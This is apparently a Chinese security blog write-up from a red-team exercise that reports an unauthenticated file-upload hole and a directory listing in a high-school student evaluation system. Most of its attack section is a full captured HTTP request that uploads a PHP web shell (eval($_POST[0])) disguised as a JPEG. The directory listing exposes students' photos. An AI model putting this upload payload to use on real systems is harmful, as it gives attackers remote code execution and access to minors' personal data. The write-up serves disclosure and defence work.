注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
0x00 前言
描述:在护网行动中遇到的一些教育行业系统漏洞总结;该系统大多在学校内网里面基本不向外界所以一般对于其很少爆出漏洞;
0x01 漏洞详细
(1) 任意文件上传
描述:在登录xxx市高中学生综合素质评价系统之后在个人资料处有一个上传头像,测试发现存在任意上传并成功利用取得shell; WeiyiGeek.
通过对代码的分析发现并没有验证任何权限 /Website/MultiuploadFiles.php
(采用zend加密但是可以解密)
直接未登录访问:http://xxoo:8080/MultiuploadFiles.php / uploadimg.php
,然后上传一个图片用burp截包代码验证了 Content-Type
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25#POST请求
POST /MultiuploadFiles.php?action=act HTTP/1.1
Host: *.*.*.*:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://*.*.*.*:8080/MultiuploadFiles.php
Cookie: PHPSESSID=q7f4cjpdtpg97e9mn9diqi4p05
X-Forward-For: 127.0.0.1'
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------64873175618108
Content-Length: 818
-----------------------------64873175618108
Content-Disposition: form-data; name="afile"; filename="test.php"
Content-Type: image/jpeg
<?php echo(2333334-1);eval($_POST[0]);?>
-----------------------------64873175618108
Content-Disposition: form-data; name="button"
æäº¤
-----------------------------64873175618108--
目录遍历
描述: 目录遍历导致的照片泄漏的问题 WeiyiGeek.http://xxoo.com/upload/
;